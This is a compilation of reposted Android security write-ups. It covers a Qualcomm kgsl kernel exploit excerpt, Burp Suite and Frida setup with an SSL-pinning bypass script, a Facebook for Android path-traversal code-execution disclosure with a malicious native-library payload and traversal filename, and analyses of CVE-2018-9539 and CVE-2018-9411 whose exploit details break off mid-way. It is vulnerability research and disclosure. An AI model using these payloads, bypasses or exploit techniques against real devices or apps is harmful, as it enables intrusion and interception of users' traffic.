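     * the offset argument becomes the pointer to our eBPF bytecode */
    lseek64(victim_fd, (off64_t)bytecode_kaddr, SEEK_SET);
}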

As explained before, because of RKP, it is not possible to simply overwrite process credentials to become root, even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all userspace data and processes are essentially under our control, and there are many ways to take over privileged user processes, such as those running with system privilege, to effectively gain their privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another technique, mentioned in Galaxy's Meltdown — Exploiting SVE-2020-18610, is to overwrite the kernel stack of a privileged process to gain arbitrary kernel code execution as that process. In short, there are many post-exploitation techniques available at this stage to effectively root the phone.

Conclusion

In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was the result of a mismatch between the user-supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean-up logic being applied when an error occurred. In this case, two common software errors, ambiguity in the role of a type and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.

While great progress has been made in sandboxing userspace services in Android, the kernel, and in particular vendor drivers, remains a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to the full power of the kernel, which often results in a much shorter exploit bug chain.

The full exploit can be found here with some set up notes.

Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.

Android Security Testing: Setting up burp suite with Android VM/physical device

Android Security Testing: Setting up burp suite with Android VM/physical device

Original text by Sarvesh Sharma

Setting up Burp Suite with an Android device is simple, but a little tricky.

There are several ways to set up this environment.
1. Setting up Burp Suite with an Android VM (needs Genymotion with VirtualBox).
2. Setting up Burp Suite with a physical Android device (needs a rooted Android device).

Setting up Burp Suite with an Android VM (needs Genymotion with VirtualBox) or with a physical Android device.

Follow the steps mentioned below.
Prerequisites:
i. Burp Suite.
ii. Genymotion (with VirtualBox).

or

ii. Android device (rooted).
iii. ADB tools (click here to download).
iv. Setting up the proxy and certificate in the Android VM/device.
v. Frida installed on the host PC and the Frida server file to run Frida from the Android device (Python installed on the host machine (PC/laptop)).

i. Burp Suite.

Step 1: Certificate export: Open Burp Suite. Go to Proxy → Options → Proxy Listeners → click on Import / export CA certificate → under Export, choose Certificate in DER format (e.g. cacert.der) → click Next → select any file name with the extension .der → click Next.

[Image: Burp certificate export]

Step 2: Go to the folder where you saved the Burp CA certificate → change the extension from .der to .crt (e.g. cacert.crt) → and save it.

Step 3: Proxy setting in Burp: Go to Proxy → Options → Proxy Listeners → click Add → select Specific address and then select the IP of the machine where Burp is running, or simply select All interfaces (it will intercept all the traffic going through your system) → enable this listener.

[Image: Burp proxy setting]

ii. Genymotion (with VirtualBox).

Step 1: Installing Genymotion: Download Genymotion (select the version bundled with VirtualBox; click here to download) → register with Genymotion → log in → click the Add icon to add a new virtual device → select the Android API level according to the Android version → select a device from the list → click Next. (The recommended device and settings are in the attached screenshots.)

[Image: Genymotion download]
[Image: VM device selection]
[Image: VM device settings]

Step 3: Install Open Gapps/Google Play Services:

  1. Power on the VM device.
  2. Click on the Open Gapps icon in the sidebar. Follow the steps and it will automatically download and install Gapps on your VM device.

or

ii. Android Physical Device.

Note: We need an Android device running Android 6.0 or newer. Along with this we need to root the device (there are different ways to root a device; flashing Magisk is one of the popular and recommended ways to root an Android device).

Step 1: Just plug the Android device with a USB cable into the system where you want to capture the traffic.

iii. ADB tools (click here to download):

You can download the ADB tools from the link above. It will redirect to a page where you can select the ADB tools package according to your host machine: select "SDK Platform-Tools for Windows/Mac/Linux", accept the required terms and download, then extract the tools to any location (you will need to navigate to this location in cmd/terminal whenever you use the ADB tools). ADB tools are useful for doing out-of-the-box stuff on Android, like installing an app on the device directly from your laptop/PC or pushing a file directly to any location. (We will see the use of ADB in the upcoming steps.)

To install the ADB tools globally: go to Start in Windows → search for "Edit the system environment variables" → open it → in the Advanced tab → Environment Variables → select and edit PATH in the system variables → click New → paste the path of the ADB tools directory (where you extracted the downloaded ADB tools zip).

iv. Setting up the proxy and certificate in the Android VM/device.

Step 1: Setting up the proxy in Android: Power on the Android device / the Android VM from Genymotion (if it shows an IP-related error at boot, start the device listed in VirtualBox and power it off after it gets an IP) → go to Settings → go to Wi-Fi → long-press the Wi-Fi network listed there and select Modify network → set Proxy to Manual → enter as hostname your host machine's IP and the port that was configured for the Burp proxy listener → save.

[Image: setting up the proxy in Android]

Step 2: Setting up the burp Certificate in Android:

Open cmd/terminal. Move to the directory where ADB tools are present.

Push the Burp certificate to the Android device: there are two ways to add a certificate on the Android device.
i. Adding the certificate to the user-defined certificates (recommended): push the Burp certificate (with the .crt extension) using the command

"adb push path_to_certificate /sdcard/Download/".

Switch to the Android device → go to Settings → Security → Install from SD card → select the certificate from the Download folder → it will ask for a name; enter any name here (e.g. Burp CA) → it will ask you to add PIN security → enter a security PIN → Next.

ii. Adding the certificate to the system-defined certificates: Download and install OpenSSL (click here) → open cmd and run the command
"openssl x509 -inform DER -in path_to_certificate/cacert.der -out path_to_certificate/cacert.pem"
then run
"openssl x509 -inform PEM -subject_hash_old -in cacert.pem"
It will print a hash value; copy and save it for further use.
Then run
"mv path_to_certificate/cacert.pem path_to_certificate/<hash>.0" or simply rename the file cacert.pem to <hash_value>.0.
Now copy the certificate to the device. Here is the list of commands to execute:
"adb remount" →
"adb push <hash_value>.0 /sdcard/Download" →
"adb shell" →
"mv /sdcard/Download/<hash_value>.0 /system/etc/security/cacerts/" →
"chmod 644 /system/etc/security/cacerts/<hash_value>.0"

Note: The benefit of adding the Burp certificate to the system-defined certificates is that we don't need to follow step v, the Frida setup. (But it's not the recommended way because it sometimes misses some API calls.)
Reference: https://enderspub.kubertu.com/burp-suite-ssl-pinning

v. Frida installation on the host PC and running the Frida server from the Android device.

Step 1: Installing Frida on the host PC: run the command "pip install frida-tools" to install Frida on the host PC.

Step 2: Running Frida from android device:

  1. Run the command "adb shell getprop ro.product.cpu.abi" to find out the processor architecture. →
  2. Download the Frida server file from here. (Select the file according to the processor architecture: if it is ARM then the arm file, if it is x86 then the x86 file.) →
  3. Extract the xz file → copy the file from the extracted folder to the Android device via the command "adb push ./frida-server-12.x.y-android-xyz /data/local/tmp/" →
  4. Now disable SELinux (this is a one-time process): "adb shell" → in the shell: "su" → "setenforce 0".
  5. Start the Frida server with: "adb shell" → "/data/local/tmp/frida-server-12.x.y-android-xyz &"

Step 3: Creating a JS file to bypass SSL pinning: This is needed to fix certificate-related errors and capture traffic in Burp Suite.
Create a JS file named frida-ssl-pin.js, paste the following content into it and save the file.

Java.perform(function() {

var array_list = Java.use("java.util.ArrayList");
var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');

ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
// console.log('Bypassing SSL Pinning');
var k = array_list.$new();
return k;
}

}, 0);

Step 4: Running the Frida receiver/client from the host machine.:

  1. Open the app on the Android device. Now find the process name by running the command from cmd: "frida-ps -U", and copy the process name.
  2. Run the Frida receiver/client with the command: "frida -U -l path_to_js_file/frida-ssl-pin.js --no-pause -f com.example.application". This will open the app again, and now you are ready to capture traffic in Burp Suite.

Special Notes:

  1. Whenever the device restarts, we need to repeat the steps for running the Frida server from the Android device.
  2. In that case, we also need to restart the Frida receiver/client on the host machine.

Please let me know in case of any query….

Arbitrary code execution on Facebook for Android through download feature

Original text by Sayed Abdelhafiz

TL;DR

Recently I discovered an ACE (arbitrary code execution) vulnerability in Facebook for Android that can be triggered by downloading a file from a group's Files tab, without even opening the file.

Background

I was digging into the method that Facebook uses to download files from groups, and I found that Facebook uses two different mechanisms. If the user downloads the file from the post itself, it is downloaded via the built-in Android service called DownloadManager; as far as I know this is a safe method for downloading files. If the user decides to download the file from the Files tab, it is downloaded through a different method: in a nutshell, the application fetches the file and then saves it to the Download directory without any filtering.

[Image: the file download code. Note: the highlighted code is the fix that Facebook pushed; the vulnerable code did not include it.]

Path traversal

The vulnerability was in the second method. Security measures were implemented on the server side when uploading the files, but they were easy to bypass. The application simply fetches the downloaded file and saves it, for example, to /sdcard/Downloads/FILE_NAME without filtering FILE_NAME to protect against path traversal attacks. The first idea that came to my mind was to use path traversal to overwrite native libraries, which would lead to arbitrary code execution.

I set up my Burp Suite proxy, intercepted the upload file request, modified the filename to ../../../sdcard/PoC and forwarded the request.

[Image: web upload endpoint]

Unfortunately it wasn't enough: due to the security measures on the server side, my path traversal payload was removed. I decided to play with the payload, but unfortunately no payload worked.


Bypass security measures. (Bypass?)

After many payloads, I wasn't able to bypass that filter. I came back to browse the application again, hoping to find something useful. And it came!


For the first time, I noticed that I could upload files via the Facebook mobile application. I set up a Burp Suite proxy on my phone, enabled the white-hat settings in the application to bypass SSL pinning, intercepted the upload file request and modified the filename to ../../../sdcard/PoC. The file uploaded successfully, and my payload was now in the filename!

I tried to download the file from the post, but the DownloadManager service is safe, as I said, so the attack didn't work. I navigated to the Files tab and downloaded the file. And here is our attack: my file was written to /sdcard/PoC!

Since I was able to perform path traversal, I could now overwrite the native libraries and perform an ACE attack.

Exploit

To exploit the bug I started a new Android NDK project to create a native library and put my evil code in the JNI_OnLoad function, to make sure that the evil code executes when the library is loaded.

#include <jni.h>
#include <string>
#include <stdlib.h>

JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM* vm, void* reserved) {
    system("id > /data/data/com.facebook.katana/PoC");
    return JNI_VERSION_1_6;
}

I built the project to get my malicious library, then uploaded it via the mobile upload endpoint with the filename set to /../../../../../data/data/com.facebook.katana/lib-xzs/libbreakpad.so

Our exploit now is ready!

PoC Video: https://youtu.be/j0darcE5apo

Timeline

April 29, 2020 at 5:57 AM: Submitted the report to Facebook.
April 29, 2020 at 11:20 AM: Facebook was able to reproduce it.
April 29, 2020 at 12:17 PM: Triaged.
June 16, 2020 at 12:54 PM: Vulnerability has been fixed.
July 15, 2020 at 5:11 PM: Facebook rewarded me $10,000!

Bounty

I noticed people commenting on the amount of the bounty when I tweeted about the bug. Is it small? I was shocked, objected to it and tried to discuss it with Facebook, but no way: they say the amount is fair and they won't be revisiting the decision. As Neal told me: Spencer provided you with insight into how we determined the bounty for this issue. We believe the amount awarded is reasonable and will not be revisiting this decision.

It’s up to you to decide before you report your vulnerabilities! Vendor or?

Have a nice day!

TUTORIAL – UNIVERSAL ANDROID SSL PINNING IN 10 MINUTES WITH FRIDA

( Original text BY OMESPINO)

Hi everyone, it's been a while since my last post but I'm back. Now I want to show you that you can start hacking Android apps with Frida without pain. It took me several hours to figure out how to get the Frida installation ready, but in the end it wasn't really that difficult; the main problem is that I didn't find a clear tutorial for beginners in mobile security like me, so that's why I decided to create this 10-minute tutorial. If you want to skip the Frida description you can go directly to Step 0 to start the Frida installation.

So what is frida, exactly? 

Extracted from frida website:
“It’s Greasemonkey for native apps, or, put in more technical terms, it’s a dynamic code instrumentation toolkit. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.”

So basically Frida is a tool that lets you inject scripts into native apps (in this case Android apps) to modify the application's behavior (in this case to bypass SSL pinning and perform a MitM attack, even if the application uses HTTPS/SSL connections) and perform dynamic tests in real time.

Disclaimer: this method won't work with applications that use HSTS (HTTP Strict Transport Security), for example Facebook, Instagram, Twitter, PayPal, banking apps, etc. But don't worry, most applications don't use this protocol yet.

Step 0 – set up the environment


computer

– python 2.7 

– pip for python

– adb tools (Android Debug Bridge tools)

– local proxy (Burpsuite by Larry_lau, just kidding, Burp Suite Community Edition)

android phone

– a rooted Android device (in my case a OnePlus One with Android 8.1), or

– an Android emulator with Android 4.4.4 to 8.1

Step 1 – install frida on your computer

  • # installing frida via terminal, sometimes you need to run this command as sudo
  • pip install frida

Step 2 – install frida-server on your device

Since there are many kinds of Android device architectures, we need to find out what processor our device has, so we connect the device to the computer (with the USB debugging option activated) and then run the following command:

  • # getting the processor architecture, in this case it is ARM; there are also x86, x86_64, etc.
  • adb shell getprop ro.product.cpu.abi
  • output: armeabi-v7a

Well, after knowing the architecture we can download the proper frida-server version for our device, in this case frida-server-XX.X.X-android-arm from the frida GitHub releases page (since the latest version didn't work, I highly recommend downloading frida-server-12.0.5-android-arm.xz; you can try a newer version if you want to). Once it is downloaded we need to extract the frida-server binary and then copy it to the device.

  • # extracting frida-server binary from the xz file
  • # for linux distributions
  • tar -xJf frida-server-12.0.5-android-arm.xz
  • # for macOS or BSD based
  • unxz frida-server-12.0.5-android-arm.xz
  • # then we need to copy the frida-server binary to the device with adb
  • adb push ./frida-server-12.0.5-android-arm /data/local/tmp/

Step 3 – Hello process in frida (frida’s Hello world)

Once we have installed frida (computer) and frida-server (Android) we can start interacting with Frida with the following commands:

  • # first we need to start frida-server with this adb command
  • # the last '&' is to run the command in the background
  • # disabling SELinux is very important: I spent about 4 hours trying to see what was wrong, and SELinux was preventing frida-server from running successfully; also, frida-server must run as root
  • adb shell 'su -c setenforce 0'
  • adb shell 'su -c /data/local/tmp/frida-server-12.0.5-android-arm &'
  • # then if everything works you can see frida's hello world with
  • # frida-ps lists the device's processes and the -U flag is for USB devices
  • frida-ps -U

Step 5 – Set up Burp Suite Community Edition

The quickest way to set up a connection between our devices is to connect the Android device and the computer to the same Wi-Fi network; then we just need to set the Android Wi-Fi connection to a manual proxy in the advanced section, and also set up Burp Suite with the local computer's IP (don't forget to use the same port).

We also need to install the Burp Suite certificate. Once the Android device has the proxy set up, we need to browse to http://burp, then click the "CA Certificate" button and download the certificate (note: you need to change the certificate extension from der to cer).

Last step: Bypass SSL pinning with Universal Android SSL Pinning Bypass No.2 

So, we have frida, frida-server and Burp Suite running as expected. The next step is to run the "Universal Android SSL Pinning Bypass No.2" script in order to start sniffing the application's connections, so we need to get the script and save it locally as name_script.js. Here is a blog post about this script by Mattia Vinci (you can add several scripts to Frida from the repo, or custom scripts too).

  • /*
  • Universal Android SSL Pinning Bypass
  • by Mattia Vinci and Maurizio Agazzini
  • $ frida -U -f org.package.name -l universal-ssl-check-bypass.js --no-pause
  • https://techblog.mediaservice.net/2018/11/universal-android-ssl-check-bypass-2/
  • */
  • Java.perform(function() {
  • var array_list = Java.use("java.util.ArrayList");
  • var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');
  • ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
  • // console.log('Bypassing SSL Pinning');
  • var k = array_list.$new();
  • return k;
  • }
  • }, 0);

So the only thing that we have to do is save this script as "frida-ssl-2.js" and run the following command:

  • # the -l flag is to run a custom script, in this case the ssl pinning 2 script
  • # the -f flag is for the apk package name; the --no-pause option is to not interrupt
  • # the app startup at all and still leave the spawning of the process to Frida.
  • frida -U -l frida-ssl-2.js --no-pause -f com.example.application

Then the application is going to start and you are going to see the results in Burp Suite.

So at this point you have successfully bypassed SSL pinning with Frida and you can start hacking network connections in Android applications.


Well, that's it. If you have any thoughts, doubts, comments or suggestions just drop me a line here or on Twitter @omespino. Read you later.

CVE-2018-9539: Use-after-free vulnerability in privileged Android service

( Original text by Tamir Zahavi-Brunner )

As part of our platform research in Zimperium zLabs, I have recently discovered a vulnerability in a privileged Android service called MediaCasService and reported it to Google. Google designated it as CVE-2018-9539 and patched it in the November security update (2018-11-01 patch level).

In this blog post, I will describe the technical details of this use-after-free vulnerability, along with some background information and the details of the proof-of-concept I wrote that triggers it. Link to the full proof-of-concept is available at the end of the blog post.

MediaCasService

The Android service called MediaCasService (AKA android.hardware.cas) allows apps to descramble protected media streams. The communication between apps and MediaCasService is performed mostly through two interfaces/objects: Cas, which manages the keys (reference: MediaCas Java API), and Descrambler, which performs the actual descramble operation (reference: MediaDescrambler Java API).

Underneath the MediaCasService API, the actual operations are performed by a plugin, which is a library that the service loads. In our case, the relevant plugin is the ClearKey plugin, whose library is libclearkeycasplugin.so.

In order to descramble data, apps need to use both the Cas object and the Descrambler object. The Descrambler object is used for the actual descramble operation, but in order to do that, it needs to be linked to a session with a key. In order to manage sessions and add keys to them, the Cas object is used.

Internally, the ClearKey plugin manages sessions in the ClearKeySessionLibrary, which is essentially a hash table. The keys are session IDs, while the values are the session objects themselves. Apps receive the session IDs which they can use to refer to the session objects in the service.

After creating a session and attaching a key to it, apps are in charge of linking it to a Descrambler object. The descrambler object has a member called mCASSession, which is a reference to its session object and is used in descramble operations. While there is no obligation to do so, once a Descrambler session is linked with a session object, an app can remove that session from the session library. In that case, the only reference to the session object will be through the Descrambler’s mCASSession.

An important note is that references to session objects are held through strong pointers (sp class). Hence, each session object has a reference count, and once that reference count reaches zero the session object is released. References are either through the session library or through a Descrambler’s mCASSession.

The vulnerability

Let’s take a look at ClearKey’s descramble method:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)

 

As you can see, the session object referenced by mCASSession is used here in order to decrypt, but its reference count does not increase while it is being used. This means that it is possible for the decrypt function to run with a session object which was released, as its reference count was decreased to zero.

This allows an attacker to cause a use-after-free (the session object will be used after it was freed) through a race condition. Before running descramble, the attacker would remove the reference to the session object from the session library, leaving the Descrambler’s mCASSession as the only reference to the session. Then, the attacker would run descramble at the same time as setting the session of the Descrambler to another session, which can cause a race condition. Setting a different session for the Descrambler would release the original session object (its reference count would drop to zero); if this happens in the middle of mCASSession->decrypt, then decrypt would be using a freed session object.

Proof of concept

Before going into the details of the PoC, there is one note about its effect.

In this PoC, nothing gets allocated in place of the released session object; we just let the decrypt function use a freed object. One of the members of the session object that decrypt uses is mKeyLock, which is essentially a mutex that decrypt attempts to lock:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)

 

As you might expect, when a session object is released, the mutex of its mKeyLock is destroyed. Therefore, when the use-after-free is triggered, decrypt attempts to use an already destroyed mutex.

Interestingly, this is where a recent change comes into play. Up until Android 8.1, attempting to use a destroyed mutex would return an error, which in this case would simply be ignored. Since Android 9, attempting to use a destroyed mutex results in an abort, which crashes the process:

Snippet from bionic/libc/bionic/pthread_mutex.cpp (source)

 

This means that while the PoC should always cause a use-after-free, only Android 9 has a way to detect whether it worked or not. In older versions, there is no noticeable effect. Therefore, the PoC is mainly intended to run on Android 9.

After covering the effect of the PoC, here is a high-level overview of the actions it performs:

  1. Initialize Cas and Descrambler objects.
  2. Use the Cas object in order to create two sessions: session1 and session2. Both of them will be referenced from the session library.
  3. Link session1 to the Descrambler object, and then use the Cas object in order to remove it from the session library. Now, session1 only has a reference from the Descrambler object; its reference count is one.
  4. At the same time:
    • Run multiple threads which perform descramble through the Descrambler object.
    • Set the session of the Descrambler object to session2.
  5. If a descramble call in one of the threads did not return, it means that the PoC was successful and the service crashed. If not, retry again from step 2.

Full source code for the PoC is available on GitHub.

Timeline

  • 08.2018 – Vulnerability discovered
  • 08.2018 – Vulnerability details + PoC sent to Google
  • 11.2018 – Google distributed patches

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

 

CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services

( Original text by Tamir Zahavi-Brunner )


As part of our platform research in Zimperium zLabs, I have recently disclosed to Google a critical vulnerability affecting multiple high-privileged Android services. Google designated it as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), with additional patches in the September security update (2018-09-01 patch level).

I also wrote a proof-of-concept exploit for this vulnerability, demonstrating how it can be used in order to elevate permissions from the context of a regular unprivileged app.

In this blog post, I will cover the technical details of the vulnerability and the exploit. I will start by explaining some background information related to the vulnerability, followed by the details of the vulnerability itself. I will then describe why I chose a particular service as the target for the exploit over other services that are affected by the vulnerability. I will also analyze the service itself in relation to the vulnerability. Lastly, I will cover the details of the exploit I wrote.

Project Treble

Project Treble introduces plenty of changes to how Android operates internally. One massive change is the split of many system services. Previously, services contained both AOSP (Android Open Source Project) and vendor code. After Project Treble, these services were all split into one AOSP service and one or more vendor services, called HAL services. For more background information, the separation between services is described more thoroughly in my BSidesLV talk and in my previous blog post.

HIDL

The separation of Project Treble introduces an increase in the overall amount of IPC (inter-process communication): data which was previously passed within the same process between AOSP and vendor code must now pass through IPC between AOSP and HAL services. As most IPC in Android goes through Binder, Google decided that the new IPC should do so as well.

But simply using the existing Binder code was not enough, Google also decided to perform some modifications. First, they introduced multiple Binder domains in order to separate between this new type of IPC and others. More importantly, they introduced HIDL – a whole new format for the data passed through Binder IPC. This new format is supported by a new set of libraries, and is dedicated to the new Binder domain for IPC between AOSP and HAL services. Other Binder domains still use the old format.

The operation of the new HIDL format compared to the old one is a bit like layers. The underlying layer in both cases is the Binder kernel driver, but the top layer is different. For communication between HAL and AOSP services, the new set of libraries is used; for other types of communication, the old set of libraries is used. Both sets of libraries contain very similar code, to the point that some of the original code was even copied to the new HIDL libraries (although personally I could not find a good reason for copy-pasting code here, which is generally not a good practice). The usage of each of these libraries is not exactly the same (you cannot simply substitute one with another), but it is still very similar.

Both sets of libraries represent data that transfers in Binder transactions as C++ objects. This means that HIDL introduces its own new implementation for many types of objects, from relatively simple ones like objects that represent strings to more complex implementations like file descriptors or references to other services.

Sharing memory

One important aspect of Binder IPC is the use of shared memory. In order to maintain simplicity and good performance, Binder limits each transaction to a maximum size of 1MB. For situations where processes wish to share larger amounts of data between each other through Binder, shared memory is used.

In order to share memory through Binder, processes utilize Binder’s feature of sharing file descriptors. The fact that file descriptors can be mapped to memory using mmap allows multiple processes to share the same memory region by sharing a file descriptor. One issue here with regular Linux (non-Android) is that file descriptors are normally backed by files; what if processes want to share anonymous memory regions? For that reason, Android has ashmem, which allows processes to allocate memory to back file descriptors without an actual file involved.

Sharing memory through Binder is an example of different implementations between HIDL and the old set of libraries. In both cases the eventual actions are the same: one process maps an ashmem file descriptor in its memory space, transfers that file descriptor to another process through Binder and then that other process maps it in its own memory space. But the implementations for the objects which handle this are different.

In HIDL’s case, an important object for sharing memory is hidl_memory. As described in the source code: “hidl_memory is a structure that can be used to transfer pieces of shared memory between processes”.

The vulnerability

Let’s take a closer look at hidl_memory by looking at its members:

Snippet from system/libhidl/base/include/hidl/HidlSupport.h (source)
  • mHandle – a handle, which is a HIDL object that holds file descriptors (only one file descriptor in this case).
  • mSize – the size of the memory to be shared.
  • mName – supposed to represent the type of memory, but only the ashmem type is really relevant here.

When transferring structures like this through Binder in HIDL, complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data, while simple types (like integers) are transferred “as is”. This means that the size is transferred as a 64 bit integer. On the other hand, in the old set of libraries, a 32 bit integer is used.

This seems rather strange, why should the size of the memory be 64 bit? First of all, why not do the same as in the old set of libraries? But more importantly, how would a 32 bit process handle this? Let’s check this by taking a look at the code which maps a hidl_memory object (for the ashmem type):

Snippet from system/libhidl/transport/memory/1.0/default/AshmemMapper.cpp (source)

Interesting! Nothing about 32 bit processes, and not even a mention that the size is 64 bit.

So what happens here? The type of the length field in mmap’s signature is size_t, which means that its bitness matches the bitness of the process. In 64 bit processes there are no issues, everything is simply 64 bit. In 32 bit processes on the other hand, the size is truncated to 32 bit, so only the lower 32 bits are used.

This means that if a 32 bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actual mapped memory region will be much smaller. For instance, for a hidl_memory with a size of 0x100001000, the size of the memory region will only be 0x1000. In this scenario, if the 32 bit process performs bounds checks based on the hidl_memory size, they will hopelessly fail, as they will falsely indicate that the memory region spans over more than the entire memory space. This is the vulnerability!
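A tiny standalone illustration of the truncation (compile it as a 32-bit binary to see the effect; the size value is the one from the example above):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    uint64_t hidl_size = 0x100001000ULL;    /* size field carried inside the hidl_memory */
    size_t   map_size  = (size_t)hidl_size; /* what a 32-bit process ends up passing to mmap */

    /* On a 32-bit build this prints 0x1000: only one page is actually mapped,
     * while bounds checks done against hidl_size believe ~4GB is available. */
    printf("mapped size: 0x%zx\n", map_size);
    return 0;
}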

Finding a target

We have a vulnerability; let’s now try to find a target. We are looking for a HAL service which meets the following criteria:

  1. Compiles to 32 bit.
  2. Receives shared memory as input.
  3. When performing bounds check on the shared memory, does not truncate the size as well. For example, the following code is not vulnerable, as it performs bounds check on a truncated size_t:
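(The snippet referred to here is an image in the original post; the following is only an illustrative stand-in for the described pattern, not the actual vendor code.)

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* mem_size64 is the 64-bit size taken from the hidl_memory; offset and length
 * describe the sub-range the caller asked for. Because the size is truncated
 * to size_t first, the check is consistent with what mmap actually mapped. */
static bool range_ok(uint64_t mem_size64, size_t offset, size_t length)
{
    size_t size = (size_t)mem_size64;   /* truncated on 32-bit, just like in mmap */
    return offset <= size && length <= size - offset;
}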

These are the essential requirements for this vulnerability, but there are some more optional ones which I think make for a more interesting target:

  1. Has a default implementation in AOSP. While ultimately vendors are in charge of all HAL services, AOSP does contain default implementations for some, which vendors can use. I found that in many cases when such an implementation exists, vendors are reluctant to modify it and end up simply using it as is. This makes such a target more interesting, as it can be relevant for multiple vendors, as opposed to a vendor-specific service.

One thing you should note is that even though HAL services are supposed to only be accessible by other system services, this is not really the truth. There are a select few HAL services which are in fact accessible by regular unprivileged apps, each for its own reason. Therefore, the last requirement for the target is:

  1. Is directly accessible from an unprivileged app. Otherwise this would make everything a bit hypothetical, as we would be talking about a target which is only accessible once you have already compromised another service.

Luckily, there is one HAL service which meets all these requirements: android.hardware.cas, AKA MediaCasService.

CAS

CAS stands for Conditional Access System. CAS in itself is mostly out of the scope of this blog post, but in general, it is similar to DRM (so much so that the differences are not always clear). Simplistically, it functions in the same way as DRM – there is encrypted data which needs to be decrypted.

MediaCasService

First and foremost, MediaCasService indeed allows apps to decrypt encrypted data. If you read my previous blog post, which dealt with a vulnerability in a service called MediaDrmServer, you might notice that there is a reason for the comparison with DRM. MediaCasService is extremely similar to MediaDrmServer (the service in charge of decrypting DRM media), from its API to the way it operates internally.

A slight change from MediaDrmServer is the terminology: instead of decrypt, the API is called descramble (although they do end up calling it decrypt internally as well).

Let’s take a look at how the descramble method operates (note that I am omitting some minor parts here in order to simplify things):

Unsurprisingly, data is shared over shared memory. There is a buffer indicating where the relevant part of the shared memory is (called srcBuffer, but is relevant for both source and destination). On this buffer, there are offsets to where the service reads the source data from and where it writes the destination data to. It is possible to indicate that the source data is in fact clear and not encrypted, in which case the service will simply copy data from source to destination without modifying it.

This looks great for the vulnerability! At least if the service only uses the hidl_memory size in order to verify that it all fits inside the shared memory, and not other parameters. In that case, by letting the service believe that our small memory region spans over its entire memory space, we could circumvent the bounds checks and put the source and destination offsets anywhere we like. This should give us full read+write access to the service memory, as we could read from anywhere to our shared memory and write from our shared memory to anywhere. Note that negative offsets should also work here, as even 0xFFFFFFFF (-1) would be less than the hidl_memory size.

Let’s verify that this is indeed the case by looking at descramble’s code. Quick note: the function validateRangeForSize simply checks that "first_param + second_param <= third_param" while minding possible overflows.

Snippet from hardware/interfaces/cas/1.0/default/DescramblerImpl.cpp (source)

As you can see, the code checks that srcBuffer lies inside the shared memory based on the hidl_memory size. After this the hidl_memory is not used anymore and the rest of the checks are performed against srcBuffer itself. Perfect! All we need then in order to achieve full read+write access is to use the vulnerability and then set srcBuffer’s size to more than 0xFFFFFFFF. This way, any value for the source and destination offsets would be valid.


[Figure: Using the vulnerability for out-of-bounds read]

 


[Figure: Using the vulnerability for out-of-bounds write]

The TEE device

Before writing an exploit using this (very good) primitive, let’s think about what we really want this exploit to achieve. A look at the SELinux rules for this service shows that it is in fact heavily restricted and does not have a lot of permissions. Still, it has one interesting permission that a regular unprivileged app does not have: access to the TEE (Trusted Execution Environment) device.

This permission is extremely interesting as it lets an attacker access a wide variety of things: different device drivers for different vendors, different TrustZone operating systems and a large number of trustlets. In my previous blog post, I have already discussed how dangerous this permission can be.

While there are indeed many things you can do with access to the TEE device, at this point I merely wanted to prove that I could get this access. Hence, my objective was to perform a simple operation which requires access to the TEE device. In the Qualcomm TEE device driver, there is a fairly simple ioctl which queries for the version of the QSEOS running on the device. Therefore, my target when building the exploit for MediaCasService was to run this ioctl and get its result.

The exploit

Note: My exploit is for a specific device and build – Pixel 2 with the May 2018 security update (build fingerprint: “google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys”). A link to the full exploit code is available at the end of the blog post.

So far we have full read+write over the target process memory. While this is a great primitive, there are two issues that need to be solved:

  • ASLR – while we do have full read access, it is only relative to where our shared memory was mapped; we do not know where it is compared to other data in memory. Ideally, we would like to find the address of the shared memory as well as addresses of other interesting data.
  • For each execution of the vulnerability, the shared memory gets mapped and then unmapped after the operation. There is no guarantee that the shared memory will get mapped in the same location each time; it is entirely possible that another memory region will take its place between executions.

Let’s take a look at some of the memory maps of the linker in the service memory space for this specific build:

As you can see, the linker happens to create a small gap of 2 memory pages (0x2000) between linker_alloc_small_objects and linker_alloc. The addresses for these memory maps are relatively high; all libraries loaded by this process are mapped to lower addresses. This means that this gap is the highest gap in memory. Since mmap’s behavior is to try to map to high addresses before low addresses, any attempt to map a memory region of 2 pages or less should be mapped in this gap. Luckily, the service does not normally map anything so small, which means that this gap should stay there. This solves our second issue, as this is a deterministic location in memory where our shared memory will always be mapped.

Let’s look at the data in the linker_alloc straight after the gap:

The linker data here happens to be extremely helpful for us; it contains addresses which easily indicate the address of the linker_alloc memory region. Since the vulnerability gives us relative read, and we already concluded that our shared memory will be mapped straight before this linker_alloc, we can use it in order to determine the address of the shared memory: taking the address at offset 0x40 and subtracting 0x10 gives the linker_alloc address, and subtracting the size of the shared memory itself from that gives the shared memory address.
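A compact sketch of this computation; read64() stands for the relative-read primitive (offsets are relative to the start of our shared memory), shm_size for the size of that mapping, and the 0x40/0x10 offsets are specific to this build:

#include <stdint.h>
#include <stddef.h>

extern uint64_t read64(size_t rel_off);   /* relative read built on the vulnerability */

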